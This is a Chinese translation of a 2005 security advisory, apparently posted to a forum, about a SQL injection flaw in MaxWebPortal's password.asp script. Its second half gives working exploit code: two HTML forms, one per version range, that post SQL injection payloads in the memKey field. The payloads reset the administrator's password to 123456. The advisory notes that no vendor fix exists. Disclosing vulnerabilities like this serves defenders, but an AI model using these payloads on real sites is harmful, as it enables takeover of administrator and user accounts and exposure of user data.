[翻译]MaxWebPortal 的'password.asp'存在 SQL 注入
资料翻译:fpx[BCT]翻译网站: Bug.Center.Team [url]http://www.cnbct.org[/url]
SecurityTracker id: 1014048
SecurityTracker 网址: http:// securitytracker.com/id?1014048
CVE 叁考: GENERIC-MAP-NOMATCH
日期: 2005 年5月 25 日
影响: 暴露系统信息、使用者数据。攻击者同过网络可以修改官方信息、使用者信息
受影响版本: 1.35,1.36,2.0,20050418
摘要: Grayhatz 的 Soroush Dalili 公布了在MaxWebPortal的 'password.asp'脚本中存在漏洞, 远程攻击者可以注入SQL指令。
具体: 'password.asp' 脚本中'memKey' 叁数设置不适当。 远程攻击者可以通过构造特殊参数运行数据库的sql指令。
利用实例:修改使用者甚至管理员的密码。
解决: 厂商尚未提供有效方法。
厂商网址: [url]www.maxwebportal.com[/url]
利用代码:
Version 1.35 或更老:
-----------------Code Start-----Version 1.35 and older--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
Version 1.36, 2.0, 20050418 Next:
-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
页:
[1]